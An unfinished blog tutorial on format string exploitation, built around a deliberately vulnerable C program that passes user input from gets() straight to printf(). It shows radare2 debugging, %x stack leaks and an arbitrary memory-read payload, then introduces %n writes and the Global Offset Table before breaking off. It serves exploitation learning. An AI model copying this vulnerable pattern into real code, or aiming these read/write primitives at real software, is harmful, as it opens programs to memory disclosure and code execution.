2017-03-25

Format String Exploitation 00: testGOTwrite

POST STILL UNDER CONSTRUCTION

In an effort to better understand format string exploitation, I constructed the following trivial example and decided to write a walkthrough for it.

This example is ideal for those of you who are just getting into exploitation and are wanting to see how a simple format string exploit works.

Consider the following example:

#include <stdio.h>
#include <stdlib.h>

void victory(){
    printf("Somehow you've won...\n");
}

void printStuff(){
    char input[100];
    gets(input);
    printf(input);
}

int main(){

    printStuff();
    exit(0);

}

If you've never abused printf() in the way I'm about to show you, it is not immediately obvious how the above program can have its execution flow redirected with printf(). Our first goal will be to call the victory() function. However, generalizing the technique can lead to arbitrary code execution, like executing /bin/sh.

Even though a buffer overflow exploit is still possible, we're assuming for the sake of example that we can't use stack-smashing.

We can compile this program using:

-> % /usr/bin/gcc -m32 ./testGOTwrite.c -o testGotwrite

However if you'd like to make use of the sample provided exploit, you can download all the necessary files here: testGOTwrite.7z If you compile this program yourself, the provided payload most likely won't work and will have to be modified for the addresses to line up.

Now that we have the binary in hand, run it and see what happens:

-> % ./testGOTwrite 
HERPDERP
HERPDERP%
-> % ./testGOTwrite
%x.%x.%x.%x
1.f77a18f8.f7609eb3.ff8102ea%

Notice on the first invocation that the input string is merely echoed back to you, while in the second examples highlighted lines, some strange numbers appear in place of the %x. The data that is being printed out is in fact stack data. To see what is happening in greater detail, let's fire up radare2:

-> % r2 -d testGOTwrite
Process with PID 6687 started...
= attach 6687 6687
bin.baddr 0x08048000
Using 0x8048000
Assuming filepath /home/tobaljackson/programming/c/exploit/format_string/testGOTwrite
asm.bits 32
 -- All your base are belong to r2

After loading the binary, we use aaa to analyze all functions:

[0xf77d9bd0]> aaa
[x] Analyze all flags starting with sym. and entry0 (aa)
TODO: esil-vm not initialized
[Cannot determine xref search boundariesr references (aar)
[x] Analyze len bytes of instructions for references (aar)
[x] Analyze function calls (aac)
[ ] [*] Use -AA or aaaa to perform additional experimental analysis.
[x] Constructing a function name for fcn.* and sym.func.* functions (aan))
= attach 6687 6687

Followed by seeking to our printStuff() function and setting a breakpoint on the printf() function called:

[0xf77d9bd0]> s sym.printStuff
[0x080484b4]> pdf
/ (fcn) sym.printStuff 39
|   sym.printStuff ();
|           ; var int local_6ch @ ebp-0x6c
|              ; CALL XREF from 0x080484ec (sym.main)
|           0x080484b4      55             push ebp
|           0x080484b5      89e5           mov ebp, esp
|           0x080484b7      83ec78         sub esp, 0x78               ; 'x'
|           0x080484ba      83ec0c         sub esp, 0xc
|           0x080484bd      8d4594         lea eax, dword [ebp - local_6ch]
|           0x080484c0      50             push eax
|           0x080484c1      e88afeffff     call sym.imp.gets          ; char*gets(char *s)
|           0x080484c6      83c410         add esp, 0x10
|           0x080484c9      83ec0c         sub esp, 0xc
|           0x080484cc      8d4594         lea eax, dword [ebp - local_6ch]
|           0x080484cf      50             push eax
|           0x080484d0      e86bfeffff     call sym.imp.printf        ; int printf(const char *format)
|           0x080484d5      83c410         add esp, 0x10
|           0x080484d8      90             nop
|           0x080484d9      c9             leave
\           0x080484da      c3             ret
[0x080484b4]> db 0x80484d0

We're now poised to run the program, providing our input and seeing what the stack looks like just before printf() is called:

[0x080484b4]> dc
Selecting and continuing: 6687
%x.%x.%x.%x
hit breakpoint at: 80484d0
[0x080484b4]> pxw 80 @ esp
0xffed8a70  0xffed8a8c 0x00000001 0xf77fd8f8 0xf7665eb3  .............^f.
0xffed8a80  0xffed8aaa 0x00000000 0xf77e2830 0x252e7825  ........0(~.%x.%
0xffed8a90  0x78252e78 0x0078252e 0x00c30000 0x00000000  x.%x.%x.........
0xffed8aa0  0xf77fcfc4 0xf77fd8f8 0xffed8ac0 0x0804827c  ............|...
0xffed8ab0  0x00000000 0xffed8b54 0xf778e000 0x00000016  ....T.....x.....

After supplying the input string of %x.%x.%x.%x we use the pxw command to print 80 bytes of the stack. Take a look at the highlighted line above and notice that after the stack address (0xffed8a70) we have some familiar looking output. Since this is a 32 bit binary, the top stack word (0xffed8a8c) is considered the first argument to printf() (the pointer to our format string), while the subsequent 4 stack words are what get printed out by the format string.

The reason this works like this is printf() maintains an internal pointer which starts 1 word after the stack pointer. Since our supplied format string was four of %x., the printed stack words themselves are dot-delimited, making the program output easy to read.

Note that when running a program which expects stdin and stdout in radare2, it's not always possible to see the program's output on the commandline.
This is a prime reason to use stream redirection to redirect the program's stdin, stdout, or both to another terminal interface. (See "Debugging a Program by Redirecting IO to Another Terminal")

Something to notice is that in the stack output printed above, we can actually see our original format string, also on the stack, starting at address 0xffed8a8c (a pointer to which is on top of the stack). This is both interesting and important. What happens if we write enough string formatting to reach our original input string?

Observe:

-> % ./testGOTwrite
AAAA%x.%x.%x.%x.%x.%x.%x.%x.%x
AAAA1.f77848f8.f75eceb3.fff9770a.0.f7769830.41414141.252e7825.78252e78

Here we've prefixed our input string with four A's to make it easier to see when we've reached our input string on the stack. Since the hexadecimal representation of A is 0x41, we can see that this is the 7th word on the stack. printf() gives us a direct addressing notation in order to skip the first 6 words on the stack:

-> % ./testGOTwrite
AAAA%7$x
AAAA41414141

By inserting a 7$ between the % and x, we were able to tell printf() we wanted to directly reference the 7th stack word to pass as an argument for the string format variable. Well, how is this useful?

Whereas many of the format specifiers for printf() interpret the arguments as immediate values (simply printing text), there are two notable exceptions which treat the argment as a pointer: %s and %n.

The %s format specifier dereferences the argument in an attempt to print the string/characters at the specified memory address. Can you see where I'm going with this?

Let's try it:

-> % ./testGOTwrite
%s
[1]    20278 segmentation fault (core dumped)  ./testGOTwrite

Hmm, a SEGFAULT. What went wrong? Well looking back at our output above, the first argument on the stack has been 0x1, which is an unmapped memory region. So when printf() attempts to dereference 0x1, the program crashes. Lets try again but with a valid memory address.

Read memory primitive

We'll use rabin2 to get main's memory address, then use echo to write that memory address in little-endian format before our format string:

-> % rabin2 -M ./testGOTwrite                        
[Main]
vaddr=0x080484db paddr=0x000004db

-> % echo -e '\xdb\x84\x04\x08%7$s' | ./testGOTwrite      
ۄ�L$����q�U��Q���������
                         j%                                                   

-> % echo -e '\xdb\x84\x04\x08%7$s' | ./testGOTwrite | xxd
00000000: db84 0408 8d4c 2404 83e4 f0ff 71fc 5589  .....L$.....q.U.
00000010: e551 83ec 04e8 c3ff ffff 83ec 0c6a       .Q...........j

From the output above, we can see that the first time we try running testGOTwrite we get a bunch of gibberish. The gibberish, when viewed through the lens of xxd however, is revealed to be a sequence of bytes. We can see the first four bytes db84 0408 are the same as what we entered. But what about the bytes that follow? Well, since we chose main's memory address, we should expect to see the bytecode at the start of main. Back in radare2:

[0xf7711bd0]> s main
[0x080484db]> pd 10
            ;-- main:
            0x080484db      8d4c2404       lea ecx, dword [esp + 4]    ; 0x4 ; 4
            0x080484df      83e4f0         and esp, 0xfffffff0
            0x080484e2      ff71fc         push dword [ecx - 4]
            0x080484e5      55             push ebp
            0x080484e6      89e5           mov ebp, esp
            0x080484e8      51             push ecx
            0x080484e9      83ec04         sub esp, 4
            0x080484ec      e8c3ffffff     call sym.printStuff
            0x080484f1      83ec0c         sub esp, 0xc
            0x080484f4      6a00           push 0

Lo and behold, we have hijacked printf() to be able to read any mapped memory of the running process! Look at the middle column for the instruction bytecode, and compare them with the xxd output above (starting after the db84 0408 with 8d4c...). Notice that the bytes stopped only when the 00 was reached, the normal string terminator.

Now, being able to read memory is pretty great. We can use this for instance to leak data from the Global Offset Table, which we use in the time_is challenge solution. But for this example printf() exploit, we only need to write data.

Enter the Drago%n

As mentioned earlier, the %n operator is similar to %s in that it is treated as a pointer rather than an immediate value. Where it differs though is that instead of reading from the address, it writes to it.
Let that sink in.
printf() can write data to memory.

Let's try it out. First, we'll use radare2 to look at the memory map to see what's writable:

[0x080484b4]> dm
sys   4K 0x08048000 * 0x08049000 s -r-x /testGOTwrite /testGOTwrite ; map._testGOTwrite._r_x
sys   4K 0x08049000 - 0x0804a000 s -r-- /testGOTwrite /testGOTwrite ; map._testGOTwrite._rw_
sys   4K 0x0804a000 - 0x0804b000 s -rw- /testGOTwrite /testGOTwrite ; obj._GLOBAL_OFFSET_TABLE_
sys 1.7M 0xf755a000 - 0xf7713000 s -r-x /usr/lib32/libc-2.25.so /usr/lib32/libc-2.25.so
sys   4K 0xf7713000 - 0xf7714000 s ---- /usr/lib32/libc-2.25.so /usr/lib32/libc-2.25.so
sys   8K 0xf7714000 - 0xf7716000 s -r-- /usr/lib32/libc-2.25.so /usr/lib32/libc-2.25.so
sys   4K 0xf7716000 - 0xf7717000 s -rw- /usr/lib32/libc-2.25.so /usr/lib32/libc-2.25.so ; edi
sys  12K 0xf7717000 - 0xf771a000 s -rw- unk0 unk0
sys   8K 0xf7767000 - 0xf7769000 s -rw- unk1 unk1
sys   8K 0xf7769000 - 0xf776b000 s -r-- [vvar] [vvar] ; map._vvar_._r__
sys   8K 0xf776b000 - 0xf776d000 s -r-x [vdso] [vdso] ; map._vdso_._r_x
sys 136K 0xf776d000 - 0xf778f000 s -r-x /usr/lib32/ld-2.25.so /usr/lib32/ld-2.25.so ; map._usr_lib32_ld_2.25.so._r_x
sys   4K 0xf7790000 - 0xf7791000 s -r-- /usr/lib32/ld-2.25.so /usr/lib32/ld-2.25.so ; map._usr_lib32_ld_2.25.so._rw_
sys   4K 0xf7791000 - 0xf7792000 s -rw- /usr/lib32/ld-2.25.so /usr/lib32/ld-2.25.so
sys 132K 0xff808000 - 0xff829000 s -rw- [stack] [stack] ; map._stack_._rw_

The highlighted line above shows the memory region 0x804a000 - 0x804b000 is writable. First lets look at it and see what it is:

[0x080484b4]> s 0x804a000
[0x0804a000]> pd 10
            ;-- section_end..got:
            ;-- section..got.plt:
            ;-- section_end.GNU_RELRO:
            ;-- _GLOBAL_OFFSET_TABLE_:
            0x0804a000      149f           adc al, 0x9f   ; section 24 va=0x0804a000 pa=0x00001000 sz=32 vsz=32 rwx=--rw- .got.plt
            0x0804a002      0408           add al, 8
            0x0804a004      0000           add byte [eax], al
            0x0804a006      0000           add byte [eax], al
            0x0804a008      0000           add byte [eax], al
            0x0804a00a      0000           add byte [eax], al
            ;-- reloc.printf_12:
            0x0804a00c      .dword 0x08048346                           ; RELOC 32 printf
            ;-- reloc.gets_16:
            0x0804a010      .dword 0x08048356                           ; RELOC 32 gets
            ;-- reloc.puts_20:
            0x0804a014      .dword 0x08048366                           ; RELOC 32 puts
            ;-- reloc.exit_24:
            0x0804a018      .dword 0x08048376                           ; RELOC 32 exit

This here is the Global Offset Table!

Got GOT?

So what is this fabled Global Offset Table anyway? Well, I could go into a very lengthy and technical explanation, but this blog post goes into the nitty-gritty pretty well. If you wanted to just know at a very high level, the GOT and PLT work together to dynamically resolve shared library functions at runtime. We can illustrate this like so:

[0x0804a000]> ood
Wait event received by different pid 22602
Process with PID 23143 started...
File dbg:///testGOTwrite  reopened in read-write mode
= attach 23143 23143
Assuming filepath /testGOTwrite
[0xf77c9bd0]> s 0x0804a000
[0x0804a000]> pd 11
            ;-- section_end..got:
            ;-- section..got.plt:
            ;-- section_end.GNU_RELRO:
            ;-- _GLOBAL_OFFSET_TABLE_:
            0x0804a000      149f           adc al, 0x9f   ; section 24 va=0x0804a000 pa=0x00001000 sz=32 vsz=32 rwx=--rw- .got.plt
            0x0804a002      0408           add al, 8
            0x0804a004      0000           add byte [eax], al
            0x0804a006      0000           add byte [eax], al
            0x0804a008      0000           add byte [eax], al
            0x0804a00a      0000           add byte [eax], al
            ;-- reloc.printf_12:
            0x0804a00c      .dword 0x08048346                           ; RELOC 32 printf
            ;-- reloc.gets_16:
            0x0804a010      .dword 0x08048356                           ; RELOC 32 gets
            ;-- reloc.puts_20:
            0x0804a014      .dword 0x08048366                           ; RELOC 32 puts
            ;-- reloc.exit_24:
            0x0804a018      .dword 0x08048376                           ; RELOC 32 exit
            ;-- reloc.__libc_start_main_28:
            0x0804a01c      .dword 0x08048386                           ; RELOC 32 __libc_start_main

The ood command causes radare to re-open the binary, which places us even before the entry point, 0xf77c9bd0, and definitely way before even the main() function is called. So we see here the addresses stored for each of these imported functions start at 0x8048346, and are separated by 16 bytes apiece. Something to notice is that these addresses fall in the .plt section of the binary:

[0x0804a000]> iS~80483
idx=11 vaddr=0x08048308 paddr=0x00000308 sz=35 vsz=35 perm=--r-x name=.init
idx=12 vaddr=0x08048330 paddr=0x00000330 sz=96 vsz=96 perm=--r-x name=.plt
idx=13 vaddr=0x08048390 paddr=0x00000390 sz=8 vsz=8 perm=--r-x name=.plt.got
idx=14 vaddr=0x080483a0 paddr=0x000003a0 sz=450 vsz=450 perm=--r-x name=.text

Let's look at what is stored at the entry for __libc_start_main:

[0x0804a000]> pd 2 @ 0x8048386
        |   0x08048386      6820000000     push 0x20                   ; 32
        `=< 0x0804838b      e9a0ffffff     jmp 0x8048330

Hmm, so we just push 0x20 onto the stack and

POST STILL UNDER CONSTRUCTION